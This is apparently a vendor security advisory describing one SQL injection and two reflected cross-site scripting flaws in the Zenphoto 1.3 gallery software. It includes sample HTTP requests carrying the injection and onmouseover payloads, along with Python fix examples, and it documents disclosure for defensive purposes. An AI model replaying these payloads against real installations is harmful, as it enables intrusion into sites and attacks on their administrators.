Note: This article refers to an older version of Acunetix.

We are continuing with the list of security vulnerabilities found in a number of web applications while testing our latest version of Acunetix WVS v7. In this blog post, we look into the details of a number of security problems discovered by Acunetix WVS in the popular web gallery application Zenphoto:

Zenphoto is a standalone gallery CMS that just makes sense and doesn’t try to do everything and your dishes. We hope you agree with our philosophy: simpler is better. Don’t get us wrong though – Zenphoto really does have everything you need for web media gallery management.

The following web vulnerabilities were found in Zenphoto Version 1.3:

  1. SQL injection in “/zenphoto_1_3/zp-core/full-image.php”, parameter “a”.
  2. Cross-site Scripting vulnerability in “/zenphoto_1_3/zp-core/admin.php”, parameter “from”.
  3. Cross-site Scripting vulnerability in “/zenphoto_1_3/zp-core/admin.php”, parameter “user”.

Technical details about each web vulnerability are below:

1. SQL injection in “/zenphoto_1_3/zp-core/full-image.php”, parameter “a”.

Source file: /var/www/zenphoto_1_3/zp-core/functions-db.php line: 65

Additional details:

SQL query:

SELECT `id`, `album_theme` FROM `zp_albums` WHERE `folder` LIKE "1ACUSTART'"*" OR `folder` LIKE "1ACUSTART'"*/
 	ACUEND"

“mysql_query” was called.

Stack trace:

  1. query([string] "SELECT `id`, `album_theme` FROM `zp_albums` WHERE `folder` LIKE "1ACUSTART'"*" OR `folder` LIKE "1ACUSTART'"*/n 	ACUEND"", [boolean] false)
  2. query_full_array([string] "SELECT `id`, `album_theme` FROM `zp_albums` WHERE `folder` LIKE "1ACUSTART'"*" OR `folder` LIKE "1ACUSTART'"*/n 	ACUEND"")
  3. getAlbumInherited([string] "1ACUSTART'"*/n 	ACUEND", [string] "album_theme", [NULL] )
  4. themeSetup([string] "1ACUSTART'"*/n 	ACUEND")

As you can see in the SQL query (or the stack trace), the string literals are delimited with double quotes, so in order to alter the SQL statement sent to the database you need to use a double quote (not a single one, as in most SQL injections).

Sample HTTP Request:

GET /zenphoto_1_3/zp-core/full-image.php?a=%24%7binjecthere%7d&i=system-bug.jpg&q=75 HTTP/1.1
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect: enabled
Cookie: PHPSESSID=fb161d1fe8597f17394ce4e39759840e; setup_test_cookie=5479
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

2. Cross-site Scripting vulnerability in “/zenphoto_1_3/zp-core/admin.php”, parameter “from”.

Attack details

URL encoded GET input from was set to " onmouseover=prompt(934419) bad=".
The input is reflected inside a tag element between double quotes.

Sample HTTP Request:

GET /zenphoto_1_3/zp-core/admin.php?from=%22%20onmouseover%3dprompt%28934419%29%20bad%3d%22 HTTP/1.1
Cookie: PHPSESSID=fb161d1fe8597f17394ce4e39759840e; setup_test_cookie=5479
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

3. Cross-site Scripting vulnerability in “/zenphoto_1_3/zp-core/admin.php”, parameter “user”.

Attack details

URL encoded POST input user was set to " onmouseover=prompt(932890) bad=".
The input is reflected inside a tag element between double quotes.

Sample HTTP Request:

POST /zenphoto_1_3/zp-core/admin.php HTTP/1.1
Content-Length: 149
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=fb161d1fe8597f17394ce4e39759840e; setup_test_cookie=5479
Host: webapps7:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

code_h=1644ca84b35bf7663c5e828744339de8&login=1&pass=acUn3t1x&redirect=%2fzp-core%2fadmin.php&user=%22%20onmouseover%3dprompt%28932890%29%20bad%3d%22
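As an added illustration (not Zenphoto's code; Python with sqlite3 stands in for the PHP/MySQL pair), here are the shapes of the two fixes: a parameterized album lookup in place of the interpolated double-quoted literal behind finding 1, and attribute-context escaping for the reflected admin.php inputs behind findings 2 and 3. The sample table rows, the XSS_PROBE constant and all function names are constructed for this example.

```python
import html
import sqlite3

# Constructed sample rows standing in for Zenphoto's zp_albums table; only the
# columns named in the post's query (id, album_theme, folder) are modelled.
ALBUMS = [(1, "default", "holiday"), (2, "zenpage", "holiday/2010")]

# The scanner's XSS probe from the post, kept as a constant for the examples.
XSS_PROBE = '" onmouseover=prompt(934419) bad="'


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE zp_albums (id INTEGER, album_theme TEXT, folder TEXT)")
    conn.executemany("INSERT INTO zp_albums VALUES (?, ?, ?)", ALBUMS)
    return conn


def vulnerable_query(folder: str) -> str:
    """Query text of the shape seen in the stack trace, built by interpolation.
    A double quote in `folder` ends the SQL literal, which is why the post notes
    that the usual single-quote payload does nothing here."""
    return ('SELECT `id`, `album_theme` FROM `zp_albums` '
            f'WHERE `folder` LIKE "{folder}" OR `folder` LIKE "{folder}/"')


def get_album_theme(conn: sqlite3.Connection, folder: str) -> list:
    """Hardened lookup: `folder` is bound as a parameter, the LIKE pattern is
    assembled server-side, and LIKE wildcards in the input are escaped so the
    value can neither alter the statement nor widen the match."""
    pattern = folder.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_") + "/%"
    return conn.execute(
        "SELECT id, album_theme FROM zp_albums "
        "WHERE folder = ? OR folder LIKE ? ESCAPE '\\' ORDER BY id",
        (folder, pattern),
    ).fetchall()


def render_user_field(user: str) -> str:
    """Reflection of `user` inside a double-quoted attribute, as admin.php does,
    but with attribute-context escaping: quote=True turns " into &quot;, so the
    probe can neither close the attribute nor start an onmouseover handler."""
    return f'<input type="text" name="user" value="{html.escape(user, quote=True)}">'
```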

These vulnerabilities were reported to the Zenphoto team on 22/7/2010 via the trac system on their website and they were fixed in the latest version of Zenphoto. If you are using Zenphoto, download the latest version from their website.

THE AUTHOR
Bogdan Calin
